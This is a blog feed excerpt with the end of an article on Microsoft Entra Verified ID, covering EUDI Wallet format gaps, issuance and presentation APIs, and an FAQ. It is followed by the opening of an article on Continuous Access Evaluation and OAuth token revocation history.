&lt;h3&gt;1. Will Microsoft add SD-JWT VC and ISO mdoc issuance to Entra Verified ID?&lt;/h3&gt;
&lt;p&gt;The &quot;supported standards&quot; page on Microsoft Learn, refreshed in March 2026, lists JWT-VC and is silent on SD-JWT VC and mdoc [@ms-learn-supported]. The &quot;what is new&quot; changelog through May 2026 records no roadmap commitment to add either format [@ms-learn-whatsnew].&lt;/p&gt;
&lt;p&gt;Microsoft staff participate in the OpenID Foundation&apos;s Digital Credentials Protocols Working Group and in the IETF OAuth Working Group. The standards bridge that would make the integration least painful (the OpenID for Verifiable Credentials High-Assurance Interoperability Profile, HAIP 1.0-02, published January 2025 [@openid-haip]) is published and stable. Microsoft has not publicly signalled it will adopt HAIP. This is the article&apos;s load-bearing open question.&lt;/p&gt;

The European Digital Identity Wallet, a regulatory product mandated by Regulation (EU) 2024/1183 (eIDAS 2). Each Member State must provision at least one wallet conforming to the EUDI Architecture and Reference Framework, support SD-JWT VC and ISO/IEC 18013-5 mdoc as baseline credential formats, and enrol on the Commission-maintained certified-wallet trust list per CIR 2025/849 [@eidas-2] [@eudi-arf] [@eur-lex-cir-2025-849].

A January 2025 OpenID Foundation profile that pins OpenID4VP, OpenID4VCI, and SIOPv2 to specific configurations for use with SD-JWT VC and ISO mdoc credentials, intended as the standards bridge for EUDI-Wallet-compatible deployments [@openid-haip].
&lt;h3&gt;2. Will Microsoft Authenticator open up to third-party wallets?&lt;/h3&gt;
&lt;p&gt;The EUDI ARF assumes wallet pluralism: any conformant wallet on any platform can present credentials to any conformant verifier [@eudi-arf]. OpenID4VP is wallet-agnostic by design [@openid4vp-final-spec]. The Microsoft Verified ID Request Service currently accepts presentations only from Microsoft Authenticator [@ms-learn-intro]. No public commitment to support third-party wallets has been located in the Microsoft Learn whats-new archive [@ms-learn-whatsnew]. The Condatis-built OIDC bridge that the NHS Digital Staff Passport pilot used to talk to other wallets is the only documented production workaround [@dif-condatis-blog], and the NHS pilot itself was retired in December 2025 [@credentially-nhs-dsp].&lt;/p&gt;
&lt;h3&gt;3. Selective disclosure inside the current format&lt;/h3&gt;
&lt;p&gt;Any verifier scenario that needs partial-claim disclosure (age-over-18 verification without a birthdate, role-scoped credentials without an employee ID) has two workarounds under the current Entra Verified ID stack: issue multiple narrow credentials per role (operational blowup; one VC per claim subset), or wait for SD-JWT VC support. The cryptographic question is also the format-layer question: SD-JWT VC delivers selective disclosure but not unlinkability, BBS delivers both [@bbs-draft-10], and the AnonCreds family already ships both today [@anoncreds-spec]. No single ship-now option gives both inside the JOSE stack.&lt;/p&gt;
&lt;h3&gt;4. Revocation at nation-state scale&lt;/h3&gt;
&lt;p&gt;W3C VC Status List 2021, in either its Working Draft or its Bitstring Status List Recommendation form, is a bitstring-compressed revocation register that scales comfortably to roughly $10^6$ credentials per list [@vc-bitstring-status]. EU Member-State Person ID populations are $10^7$ or $10^8$ individuals.&lt;/p&gt;
&lt;p&gt;Type-3 cryptographic accumulators (the construction documented in the Ursa AnonCreds paper) are the only known scalable revocation mechanism that preserves holder privacy [@ursa-anoncreds] [@anoncreds-spec]. No W3C, IETF, or ISO accumulator-revocation specification has reached working-group final status as of May 2026. The arithmetic suggests that any vendor planning national-scale issuance will need to either shard the bitstring or adopt an accumulator scheme that does not yet have a standardised wire format.&lt;/p&gt;
&lt;h3&gt;5. Cross-jurisdictional trust frameworks&lt;/h3&gt;
&lt;p&gt;The EUDI Trust List (per CIR 2025/849 [@eur-lex-cir-2025-849] [@eudi-arf-2-9]), the AAMVA Digital Trust Service [@movemag-mdl] [@aamva-mdl-guidelines], the UK Digital Identity and Attributes Trust Framework [@uk-diatf], and Microsoft&apos;s per-tenant issuer trust list each define their own issuer registries; on the survey above, none of the four specifications publishes a cross-framework interoperability bridge at the trust-framework layer as of May 2026. The DIF Trust Establishment Working Group specification carries an &quot;Editor&apos;s Draft&quot; status header [@dif-trust-est] and the IETF SPICE Working Group charter does not commit to a final-spec date [@ietf-spice]; neither venue has yet published a convergence timeline. Until then, a verifier in 2026 has to maintain a different trust list per jurisdiction.&lt;/p&gt;

gantt
    title EUDI Wallet vs Entra Verified ID format readiness
    dateFormat YYYY-MM-DD
    axisFormat %Y-%m
    section eIDAS 2 regulation
    Entry into force         :milestone, m1, 2024-05-20, 1d
    Member State wallet provisioning deadline :milestone, m2, 2026-12-24, 1d
    Mandatory private-sector acceptance       :milestone, m3, 2027-12-06, 1d
    section Entra Verified ID format
    JWT-VC GA (no SD-JWT VC, no mdoc) :a1, 2022-08-08, 2025-12-31
    Open: SD-JWT VC + mdoc issuance?  :crit, a2, 2026-01-01, 2027-12-06

Article 5a of Regulation (EU) 2024/1183 reads, in the operative paragraph: &quot;each Member State shall provide at least one European Digital Identity Wallet within 24 months of the date of entry into force of the implementing acts referred to in paragraph 23 of this Article and in Article 5c(6).&quot; [@eidas-2].&lt;p&gt;The triggering acts entered into force in late 2024, putting the wallet-provisioning deadline at 24 December 2026 and the 18-month follow-on mandatory-acceptance deadline at 6 December 2027. The Regulation is directly applicable in every Member State without national transposition. A verifier who declines to accept an EUDI Wallet presentation after the second deadline is, by the text of the Regulation, in violation. That is what makes this a deadline and not a roadmap item.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; - Plan to accept SD-JWT VC and ISO mdoc presentations via OpenID4VP, not only JWT-VC, by 6 December 2027. - Plan to consume the consolidated EU certified-wallet trust list (CIR 2025/849, machine-readable form) rather than a per-tenant verifier configuration. - Confirm with Microsoft account managers whether Entra Verified ID is targeted to &lt;em&gt;issue&lt;/em&gt; EUDI-conformant credentials by the deadline, or only to &lt;em&gt;verify&lt;/em&gt; them via a separate code path or vendor.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The architecture of Entra Verified ID has changed twice already. Whether the EUDI deadline forces a third change toward SD-JWT VC and mdoc issuance and third-party wallet support, or whether Microsoft chooses to interoperate only as a verifier (consuming EUDI credentials it does not itself issue), is the open question that defines the next two years of the product.&lt;/p&gt;
&lt;h2&gt;10. How to Issue and Verify a Credential Today&lt;/h2&gt;
&lt;p&gt;For all the architectural drama, the day-to-day developer experience is small. The Microsoft Learn quickstart can take a tenant from &quot;no Verified ID configured&quot; to &quot;first issued VC&quot; in about ten minutes, and the working code that an enterprise verifier needs is short enough to fit on one screen.&lt;/p&gt;
&lt;h3&gt;Tenant setup&lt;/h3&gt;
&lt;p&gt;Quick Setup, GA since April 2024, is a single admin-portal button that provisions a &lt;code&gt;did:web&lt;/code&gt; DID, generates a P-256 signing key, publishes &lt;code&gt;https://&amp;lt;tenant-host&amp;gt;/.well-known/did.json&lt;/code&gt;, and posts the DIF Well-Known DID Configuration document that binds the DID back to the host [@ms-learn-whatsnew] [@well-known-did-config]. The fallback for hosts the tenant administers itself is to publish the same two JSON files at the same well-known paths; the resolution algorithm is the one shown in section 5.&lt;/p&gt;
&lt;h3&gt;Defining a credential type&lt;/h3&gt;
&lt;p&gt;Each Verifiable Credential type is described by two JSON files in the Verified ID admin portal: a &lt;code&gt;displayContract&lt;/code&gt; that controls how the credential renders in Microsoft Authenticator, and a &lt;code&gt;rulesFile&lt;/code&gt; that lists the claim names, their types, and how they are sourced from the issuer&apos;s identity provider. The claim set is opaque JSON, not a JSON-LD &lt;code&gt;@context&lt;/code&gt; graph; the JWT-VC encoding will keep the claims as flat top-level fields inside the &lt;code&gt;vc.credentialSubject&lt;/code&gt; object.&lt;/p&gt;
&lt;h3&gt;Issuance API&lt;/h3&gt;
&lt;p&gt;The issuer backend calls &lt;code&gt;POST /verifiableCredentials/createIssuanceRequest&lt;/code&gt; on the Verified ID Request Service. The response carries an OpenID4VCI credential offer URL the wallet can consume, plus a short numeric PIN the user enters in Authenticator to confirm they are the same person who started the flow on the issuer&apos;s web page [@openid4vci-final-spec]. The signing of the JWT-VC itself happens inside Microsoft&apos;s service; the issuer&apos;s signing key never leaves the tenant&apos;s HSM-backed key vault.&lt;/p&gt;
&lt;h3&gt;Presentation API&lt;/h3&gt;
&lt;p&gt;The verifier backend calls &lt;code&gt;POST /verifiableCredentials/createPresentationRequest&lt;/code&gt; with a &lt;code&gt;presentation_definition&lt;/code&gt; describing which credentials to ask for (DIF Presentation Exchange v2.0.0 [@dif-pe-2]) and an &lt;code&gt;idTokenHint&lt;/code&gt; describing who the verifier expects on the other side of the wallet. The response is an OpenID4VP request URI rendered as a QR code (cross-device) or a deep link (same-device); Authenticator handles the rest and returns a Verifiable Presentation containing the requested credentials, signed and bound to the verifier&apos;s challenge [@openid4vp-final-spec].&lt;/p&gt;
&lt;p&gt;{`
// Skeleton of the JSON payload an enterprise verifier sends to the
// Verified ID Request Service. The service returns an OpenID4VP request URI.
const presentationRequest = {
  authority: &apos;did:web:verifier.contoso.com&apos;,
  callback: {
    url: &apos;&lt;a href=&quot;https://verifier.contoso.com/api/vc/presentation-callback&quot; rel=&quot;noopener&quot;&gt;https://verifier.contoso.com/api/vc/presentation-callback&lt;/a&gt;&apos;,
    state: &apos;corr-id-12345&apos;,
    headers: { &apos;api-key&apos;: process.env.VC_CALLBACK_API_KEY },
  },
  registration: { clientName: &apos;Contoso Hiring Portal&apos; },
  includeQRCode: true,
  requestedCredentials: [
    {
      type: &apos;WorkplaceCredential&apos;,
      purpose: &apos;Confirm employment&apos;,
      acceptedIssuers: [
        &apos;did:web:verifications.linkedin.com&apos;,
        &apos;did:web:hr.contoso-supplier.com&apos;,
      ],
      configuration: { validation: { allowRevoked: false, validateLinkedDomain: true } },
    },
  ],
};&lt;/p&gt;
&lt;p&gt;// POST presentationRequest to:
// &lt;a href=&quot;https://verifiedid.did.msidentity.com/v1.0/verifiableCredentials/createPresentationRequest&quot; rel=&quot;noopener&quot;&gt;https://verifiedid.did.msidentity.com/v1.0/verifiableCredentials/createPresentationRequest&lt;/a&gt;
`}&lt;/p&gt;
&lt;h3&gt;Cost and rate-limit considerations&lt;/h3&gt;
&lt;p&gt;Microsoft Learn states that &quot;there are no special licensing requirements to issue verifiable credentials&quot; [@ms-learn-vc-faq]. Face Check is documented as a premium feature that requires either a Microsoft Entra Suite licence or an explicit Face Check Add-on linked to an Azure subscription [@ms-learn-facecheck]. The Verified ID Quick Setup tutorial documents a per-tenant default of two requests per second for combined issuance and verification [@ms-learn-quick-setup]; high-volume issuers should design backoff into the call sites. The LinkedIn Workplace Verification deployment, with its 70-plus founding organizations and millions of LinkedIn members on the holder side, is the worked end-to-end example of what the architecture can sustain in production [@chik-linkedin-2023].&lt;/p&gt;
&lt;p&gt;The LinkedIn Workplace Verification cohort at launch in April 2023 included &quot;more than 70 organizations representing millions of LinkedIn members, including companies like Accenture, Avanade, and Microsoft&quot; [@chik-linkedin-2023]. The flow uses Entra Verified ID under the hood to issue a workplace credential to the employee&apos;s Microsoft Authenticator wallet and a corresponding LinkedIn &quot;Verifications&quot; badge to the LinkedIn profile.&lt;/p&gt;

flowchart LR
    Iss[Issuer or Verifier Backend] -- &quot;createIssuanceRequest / createPresentationRequest&quot; --&amp;gt; VRS[Verified ID Request Service]
    VRS -- &quot;QR code or deep link&quot; --&amp;gt; Auth[Microsoft Authenticator]
    Auth -- &quot;issuance response or VP&quot; --&amp;gt; VRS
    VRS -- &quot;callback with VC or VP&quot; --&amp;gt; Iss
    VRS -- &quot;optional Face Check call&quot; --&amp;gt; Face[Azure AI Face Check]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. From the Microsoft Entra admin portal, run Quick Setup to provision a &lt;code&gt;did:web&lt;/code&gt; DID on a host you control [@ms-learn-whatsnew]. 2. Define a credential type using the Verified ID admin portal&apos;s display contract and rules file editors [@ms-learn-supported]. 3. Use the Verifiable Credentials SDK samples in &lt;code&gt;Azure-Samples/active-directory-verifiable-credentials-*&lt;/code&gt; to build an issuer and a verifier and exchange a credential with Authenticator [@ms-learn-intro]. 4. If your scenario needs liveness, enable Face Check on the credential type and budget for the per-verification charge [@ms-learn-whatsnew].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The simplicity of this developer experience is the strongest practical evidence that the architectural decisions of 2022 through 2024 were correct. The same simplicity is the constraint that makes the EUDI second pivot architecturally awkward, because doing it &quot;as a developer convenience&quot; is exactly what Microsoft has spent four years optimising for.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. The option to select `did:ion` as a trust system was removed from the Microsoft Entra Verified ID admin portal in December 2023, and the only trust system the product supports is `did:web` [@ms-learn-whatsnew]. Microsoft&apos;s public ION node was wound down in early 2024. The Sidetree protocol remains a DIF Ratified Specification [@dif-sidetree] and the ION repository remains live on GitHub [@ion-github], but Microsoft does not anchor any production DIDs there.

No. Each Verifiable Credential is a JWT-VC signed end-to-end and presented atomically [@ms-learn-supported]. Selective disclosure of individual claims requires a different credential format: SD-JWT VC (hash-based disclosure built on the SD-JWT primitive in RFC 9901 [@rfc-9901]) or BBS (re-randomised signatures [@bbs-draft-10]). Microsoft has not announced support for either inside Entra Verified ID.

Not at general availability. Microsoft Authenticator on iOS and Android is the only supported holder wallet for Entra-issued credentials [@ms-learn-intro]. The Verified ID Request Service accepts presentations only from Authenticator. Production workarounds (such as the Condatis Credentials Gateway used by the NHS Digital Staff Passport pilot [@dif-condatis-blog]) bridge other wallets to Microsoft endpoints through an OIDC adapter, but those are integration patterns, not platform features.

Partially. The EUDI Wallet requires SD-JWT VC and ISO/IEC 18013-5 mdoc as baseline credential formats [@eudi-arf] [@eidas-2]. Microsoft has not announced a roadmap commitment to *issue* either format from Entra Verified ID. On the verifier side, OpenID4VP is wallet-agnostic by design [@openid4vp-final-spec], so an Entra-resident verifier can in principle accept presentations from an EUDI Wallet provided the wallet sends a format the verifier knows how to parse. The issuance gap is open as of May 2026.

The DID method is the same; the trust framework is different. A Microsoft-tenant `did:web` lives at a tenant-owned host (for example, `did:web:contoso.com`) and is trusted only by verifiers that explicitly add the tenant to their accepted-issuer configuration; the trust framework is the verifier&apos;s per-tenant allow-list [@ms-learn-intro]. A national-wallet `did:web` issued under an EUDI Member-State scheme lives at a government-controlled host and is trusted by every EU relying party that consumes the consolidated EU certified-wallet list maintained under CIR 2025/849 [@eur-lex-cir-2025-849] [@eudi-arf-2-9]. The cryptography and the resolution algorithm are identical; the political and legal scope of &quot;who is trusted as an issuer&quot; is the part that differs.

Only loosely. The trust root is DNS plus the X.509 certificate-authority system; the W3C `did:web` Security Considerations name this inheritance directly, stating that all DNS security considerations apply to the method [@did-web-spec]. There is no central registry of issuers, which is the operational sense in which it is decentralized, but the system is not censorship-resistant against a domain-registrar suspension or a certificate-authority mis-issuance.

Face Check is an Azure AI face-matching service that compares a live selfie taken in Microsoft Authenticator at presentation time against a photo claim on the credential. It gives the verifier evidence that the person presenting the credential is the same person to whom it was issued. It went GA on 12 August 2024 [@ms-learn-whatsnew]. Microsoft Learn classifies Face Check as a &quot;premium feature&quot;: Microsoft Entra Suite customers get it as part of the Suite, and every other tenant enables it as a Face Check Add-on linked to an Azure subscription [@ms-learn-facecheck].

No. NHS Digital confirmed the retirement of the Digital Staff Passport on 5 December 2025 [@credentially-nhs-dsp], after a four-Trust pilot phase built initially on a Sovrin-anchored architecture and later migrated to `did:web` with Microsoft Entra Verified ID as the issuer engine and a Condatis-built OIDC bridge for wallet pluralism [@condatis-nhs-dsp] [@dif-condatis-blog]. The architecture survived the pilot; the service did not.
&lt;h2&gt;12. Reading the Pattern&lt;/h2&gt;
&lt;p&gt;Three quiet pivots define the seven-year arc. In June 2022, Microsoft added &lt;code&gt;did:web&lt;/code&gt; to the supported-trust-system list alongside &lt;code&gt;did:ion&lt;/code&gt; [@ms-learn-whatsnew]. In December 2023, Microsoft removed &lt;code&gt;did:ion&lt;/code&gt; and left &lt;code&gt;did:web&lt;/code&gt; as the only option [@ms-learn-whatsnew]. A third pivot is pending: whether the EUDI Wallet deadline of 24 December 2026 [@eidas-2] forces Microsoft to add SD-JWT VC and ISO mdoc issuance to Entra Verified ID, or whether the product holds the current trade-offs and limits itself to verifier-only interop on the EUDI side.&lt;/p&gt;
&lt;p&gt;Each pivot traded an SSI-vision property for an operational property. Permissionless ledger anchoring traded for one HTTPS GET. JSON-LD elegance traded for JOSE ubiquity. Selective disclosure (still pending) may yet trade for cross-jurisdictional regulatory acceptance.&lt;/p&gt;
&lt;p&gt;The product team kept the original vocabulary in the marketing copy while the architecture moved underneath it. That is not unique to Microsoft. It is how every long-running platform engineering effort looks from outside the building. The interesting question is which of the original properties the engineering team eventually defended, and which they let go.&lt;/p&gt;
&lt;p&gt;What ships in May 2026 is not the 2019 vision. It is also not a betrayal of the vision. It is the part of the vision that an enterprise identity team has so far been able to defend in front of a quarterly engineering review against a finite operations budget.&lt;/p&gt;
&lt;p&gt;The two are different things, and they have always been different things. Reading the Entra Verified ID story as a chronicle of failure misses the point; reading it as a chronicle of unconstrained success also misses the point. The honest reading is that decentralized identity, as it exists in production at Microsoft scale, is the intersection of what the 2019 manifesto wanted, what the 2023 customer pipeline would pay for, and what the 2024 standards stack could ship without a research project.&lt;/p&gt;
&lt;p&gt;Whether the EUDI deadline forces the third pivot (toward SD-JWT VC, ISO mdoc, and wallet pluralism) or &lt;code&gt;did:web&lt;/code&gt; plus JWT-VC plus Microsoft Authenticator turns out to be the local maximum at which decentralized identity actually shipped at scale, is the question the next two years will answer. Both outcomes preserve the workforce-verification use case the product was built for. Only one preserves Microsoft&apos;s relevance to consumer and national-identity issuance.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The seven-year arc of Microsoft Entra Verified ID is not a story of an architecture that failed. It is a story of an architecture that was systematically downgraded to whatever the next quarter&apos;s engineering review would actually approve, with the original vision serving as a north star the team has kept reorienting toward as the operational constraints came into focus.&lt;/p&gt;
&lt;/blockquote&gt;

*May 2019:* &quot;We believe every person needs a decentralized, digital identity they own and control, backed by self-owned identifiers that enable secure, privacy preserving interactions.&quot; [@simons-buchner-2019]
&lt;br /&gt;
*December 2023:* &quot;The option of selecting did:ion as a trust system is removed. The only trust system available is did:web.&quot; [@ms-learn-whatsnew]
&lt;p&gt;Both sentences are true. Both are official Microsoft. Reading them as a sequence rather than as a contradiction is what understanding Entra Verified ID actually means.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;entra-verified-id-seven-year-compromise&quot; keyTerms={[
  { term: &quot;Decentralized Identifier (DID)&quot;, definition: &quot;A URI of the form did:: that resolves to a DID Document containing the subject&apos;s public keys and service endpoints. W3C DID Core lists 100+ method specifications.&quot; },
  { term: &quot;Verifiable Credential (VC)&quot;, definition: &quot;A cryptographically signed claim about a subject, issued in a format any verifier can check without the issuer being online. W3C VC Data Model v1.1 is the version Entra Verified ID implements.&quot; },
  { term: &quot;JWT-VC&quot;, definition: &quot;A VC encoded as a JSON Web Token, signed end-to-end under JWS (RFC 7515). Presented atomically: reveal every claim or none. The format Entra Verified ID issues.&quot; },
  { term: &quot;did:web&quot;, definition: &quot;A DID method that resolves a DID like did:web:example.com to a JSON DID Document at &lt;a href=&quot;https://example.com/.well-known/did.json&quot; rel=&quot;noopener&quot;&gt;https://example.com/.well-known/did.json&lt;/a&gt;. Trust root: DNS plus the X.509 CA system.&quot; },
  { term: &quot;Sidetree / ION&quot;, definition: &quot;Sidetree is a DIF Ratified Specification for batching DID operations onto any underlying ledger. ION was Microsoft&apos;s Sidetree-on-Bitcoin Layer-2 network, mainnet launched March 2021, retired December 2023.&quot; },
  { term: &quot;OpenID4VP&quot;, definition: &quot;OpenID for Verifiable Presentations, the OAuth-based protocol a verifier uses to request a VP from a wallet. Final 1.0 approved July 2025.&quot; },
  { term: &quot;OpenID4VCI&quot;, definition: &quot;OpenID for Verifiable Credential Issuance, the OAuth-based protocol an issuer uses to deliver a VC to a wallet. Final 1.0 approved September 2025.&quot; },
  { term: &quot;SD-JWT VC&quot;, definition: &quot;A VC profile built on the SD-JWT primitive (RFC 9901) that delivers selective disclosure of claims via salted hashes. Mandated by the EUDI Wallet ARF; currently an IETF draft.&quot; },
  { term: &quot;ISO/IEC 18013-5 mdoc&quot;, definition: &quot;The CBOR-encoded mobile document format defined by ISO/IEC 18013-5:2021 for mobile driver&apos;s licences. Selective disclosure native. The other format the EUDI Wallet ARF mandates.&quot; },
  { term: &quot;EUDI Wallet&quot;, definition: &quot;The European Digital Identity Wallet, mandated by Regulation (EU) 2024/1183. Member-State provisioning deadline 24 December 2026; mandatory private-sector acceptance 6 December 2027.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>decentralized-identity</category><category>entra-verified-id</category><category>verifiable-credentials</category><category>did-web</category><category>eidas-2</category><category>openid4vp</category><category>identity-architecture</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The 28-Hour Bargain: How Continuous Access Evaluation Made Long-Lived Tokens Safe</title><link>https://paragmali.com/blog/the-28-hour-bargain-how-continuous-access-evaluation-made-lo/</link><guid isPermaLink="true">https://paragmali.com/blog/the-28-hour-bargain-how-continuous-access-evaluation-made-lo/</guid><description>How Microsoft Entra Continuous Access Evaluation lets access tokens safely live up to 28 hours by pairing them with a near-real-time revocation channel.</description><pubDate>Sat, 30 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Microsoft Entra Continuous Access Evaluation (CAE) lets access tokens safely live up to 28 hours.** It works by maintaining a push-subscription channel between Entra and Microsoft 365 resource providers, so that when a user is disabled, has their password reset, or has MFA enabled, the resource provider rejects the next request with a `401` and a claims challenge -- typically within 15 minutes for critical events, instantly for IP-location changes [@ms-cae-concept]. The same pattern was standardized by the OpenID Foundation on September 2, 2025 as SSF 1.0, CAEP 1.0, and RISC 1.0 Final Specifications [@openid-three-final-specs], opening the door to vendor-neutral cross-SaaS revocation. CAE does **not** solve token theft (use DPoP for that) and does **not** cover Microsoft Defender for Endpoint or Intune as resource providers (they are signal sources into Conditional Access, not CAE consumers).
&lt;h2&gt;1. Your Fired Employee Is Still Reading Email&lt;/h2&gt;
&lt;p&gt;09:00 Tuesday. The administrator disables the account at 09:01. At 09:23, the ex-employee&apos;s open Outlook for the Web tab refreshes -- and pulls down new mail. This is not a bug. This is RFC 6749 working exactly as designed. Until Microsoft Entra shipped a fix that took ten years and three standards bodies -- the IETF, the OpenID Foundation, and NIST -- to develop, the access token that user held at 09:00 stayed cryptographically valid until 10:00 at the latest, and there was nothing &lt;a href=&quot;https://paragmali.com/blog/who-decided-this-token-is-good-a-field-guide-to-conditional-/&quot; rel=&quot;noopener&quot;&gt;Conditional Access&lt;/a&gt; could do about it [@rfc-6749].&lt;/p&gt;
&lt;p&gt;The window has a name now. It did not, for most of cloud identity&apos;s history. Microsoft&apos;s own documentation calls it &quot;the lag between when conditions change for a user, and when policy changes are enforced&quot; [@ms-cae-concept]. Between sign-in (Conditional Access territory) and the next token refresh (refresh-token territory) sits a stretch of time in which Conditional Access decisions have no enforcement surface. That stretch ranged from 60 minutes to 24 hours, depending on tenant configuration. For every OAuth 2.0 deployment from 2012 onward, this was the security debt the industry carried.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &quot;Microsoft Entra ID&quot; is the rebranded name for what most engineers learned as &quot;Azure Active Directory&quot; or &quot;Azure AD.&quot; Microsoft announced the rename in July 2023 [@ms-entra-rename-2023]; the underlying service, tenants, app registrations, and APIs are unchanged. Throughout this article, &quot;Entra&quot; and the older &quot;Azure AD&quot; refer to the same identity platform.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This article explains the engineering pattern that lets a Microsoft 365 tenant do two things that look contradictory at the same time: extend access-token lifetime from 1 hour to up to 28 hours, &lt;em&gt;and&lt;/em&gt; revoke a disabled user&apos;s session in under 15 minutes [@ms-cae-concept]. The reconciling idea is a near-real-time push channel between the identity provider (Entra) and a small set of cooperating resource providers. When you can revoke a token in minutes rather than waiting for it to expire, expiry stops doing the security work, and the token can live as long as the user actually needs it.&lt;/p&gt;

Microsoft Entra&apos;s push-subscription channel between the identity provider and cooperating resource providers (Exchange Online, SharePoint Online, Teams, and Microsoft Graph). CAE lets a resource provider revoke an already-issued access token in near-real-time -- up to 15 minutes for critical events, instantly for IP-location changes -- without waiting for the token to expire [@ms-cae-concept].
&lt;p&gt;The trade has a price. The 15-minute critical-event service-level objective is the price the channel pays for fanning out events across hyperscale Microsoft 365 infrastructure. Sub-second revocation is possible -- other vendors demonstrate it at smaller scales -- but at Exchange-Online volume, 15 minutes is the engineering economics. We will earn that number by Section 8.&lt;/p&gt;
&lt;p&gt;For now: the OAuth 2.0 designers knew about this gap when they wrote RFC 6749 in 2012. They chose it on purpose. To see why, and to see why the obvious patches all failed, we have to walk back to the moment the trade was made.&lt;/p&gt;
&lt;h2&gt;2. The Static-Expiry Compromise&lt;/h2&gt;
&lt;p&gt;In October 2012, Dick Hardt of Microsoft published RFC 6749 -- &lt;em&gt;The OAuth 2.0 Authorization Framework&lt;/em&gt; -- as the editor of record for an IETF working group that had spent five years arguing about it [@rfc-6749]. Section 1.4 defines access tokens as carrying &quot;specific scopes and durations of access,&quot; but the specification never characterizes them as short-lived. That an access token should be short enough to limit exposure was always convention, not a normative requirement: the closest the RFC comes is Section 1.5&apos;s aside that an access token &quot;may have a shorter lifetime and fewer permissions&quot; than the refresh token that renews it. Nothing in the protocol enforces a short lifetime. Nothing in the protocol provides revocation. Nothing in the protocol stops a server from issuing 24-hour bearer tokens that, once minted, stay cryptographically valid until they expire on their own.&lt;/p&gt;
&lt;p&gt;This was a deliberate trade. To see why it was rational, remember what came before.&lt;/p&gt;
&lt;h3&gt;Web Access Management: the model OAuth replaced&lt;/h3&gt;

The pre-2012 enterprise-identity pattern in which every protected HTTP request synchronously queried a central policy decision point. Strength: instant revocation, because every request consulted authoritative state. Weakness: a chatty bottleneck that did not scale to cloud volumes and could not federate trust across organizations.
&lt;p&gt;Web Access Management dominated enterprise identity from the late 1990s into the early 2010s. Every protected HTTP request to a WAM-fronted application made a synchronous round-trip to a Policy Decision Point. The PDP held authoritative session and policy state. Revoke a user? The next request failed, immediately, because the PDP said no. No token-lifetime window. No gap between policy change and enforcement.&lt;/p&gt;
&lt;p&gt;WAM was correct. WAM was also unworkable for the web that was coming. It did not scale: every request was a network hop. It did not federate: cross-organization SaaS meant the PDP could not live inside any one company&apos;s network. And it required every protected resource to participate in a single trust domain. By the time enterprises were running cross-organization SaaS at scale, the WAM model had run out of road.&lt;/p&gt;
&lt;p&gt;The OAuth 2.0 authors made the opposite trade. Replace the chatty PDP round-trip with a self-contained signed bearer token -- a JWT the resource server validates locally. Validation becomes O(1) cryptographic verification with no round-trip. Throughput scales horizontally. Federation works, because the JWT carries its own attestation of the issuer. Revocation becomes...approximated. By expiry. The token is valid until it isn&apos;t, and you trust that the lifetime is short enough.&lt;/p&gt;
&lt;p&gt;For a 2012 web of forum logins and consumer mashups, &quot;short enough&quot; was a defensible answer. For a 2020 enterprise running compliance-bound SaaS across thousands of employees, it was not.&lt;/p&gt;
&lt;h3&gt;The Zero Trust pressure&lt;/h3&gt;
&lt;p&gt;Two intellectual pressures forced the question. The first came from Google. In December 2014, Rory Ward and Betsy Beyer published &lt;em&gt;BeyondCorp: A New Approach to Enterprise Security&lt;/em&gt; in USENIX &lt;code&gt;;login:&lt;/code&gt; [@ward-beyer-2014-beyondcorp].Beyer would later co-author &lt;em&gt;Site Reliability Engineering&lt;/em&gt; (O&apos;Reilly, 2016); BeyondCorp came out of the same Google culture of evidence-driven infrastructure engineering. The argument was philosophical: a session is not a one-shot decision at sign-in. It is a time-varying authorization. Trust signals -- device posture, network location, behavioral risk -- change continuously, and the access decision should change with them. BeyondCorp was not a CAE implementation; it predates the term. But it planted the seed that login-time enforcement was not enough.&lt;/p&gt;
&lt;p&gt;The second pressure was bureaucratic. In August 2020, NIST published Special Publication 800-207, &lt;em&gt;Zero Trust Architecture&lt;/em&gt;, by Scott Rose, Oliver Borchert, Stu Mitchell, and Sean Connelly [@nist-sp-800-207]. SP 800-207 codified the BeyondCorp philosophy as U.S. federal guidance. One sentence made the engineering investment commercially rational: &lt;em&gt;&quot;Authentication and authorization (both subject and device) are discrete functions performed before a session to an enterprise resource is established.&quot;&lt;/em&gt; A federal mandate for continuous re-evaluation pushed every cloud vendor with U.S. government contracts to find an implementation. The gap RFC 6749 had left was now a procurement problem.&lt;/p&gt;
&lt;h3&gt;A name for the problem&lt;/h3&gt;
&lt;p&gt;The third moment named the gap. On February 21, 2019, Atul Tulshibagwale, then an engineer at Google, published &lt;em&gt;Re-thinking federated identity with the Continuous Access Evaluation Protocol&lt;/em&gt; on the Google Cloud blog [@tulshibagwale-2019-google-blog]. The post introduced a term -- CAEP -- and a framing: publish-and-subscribe between identity providers and resource providers, as a third option between WAM&apos;s per-request chattiness and OAuth&apos;s fire-and-forget expiry. We return to Tulshibagwale&apos;s actual proposal in Section 5. For now what matters: 2019 was the year the industry got a vocabulary for a problem it had been carrying for seven years.&lt;/p&gt;
&lt;p&gt;The OpenID Foundation working group that grew out of Tulshibagwale&apos;s proposal was originally chartered as the &lt;em&gt;Shared Signals &amp;amp; Events&lt;/em&gt; (SSE) working group. It was renamed &lt;em&gt;Shared Signals&lt;/em&gt; in subsequent years, but older industry write-ups from 2020-2022 still use the SSE abbreviation [@idsalliance-2022-11-cae].&lt;/p&gt;

gantt
    title CAE and Shared Signals timeline (2012-2025)
    dateFormat YYYY-MM
    axisFormat %Y
    section IETF standards
    RFC 6749 OAuth 2.0           :done, a1, 2012-10, 30d
    RFC 7009 Token Revocation    :done, a2, 2013-08, 30d
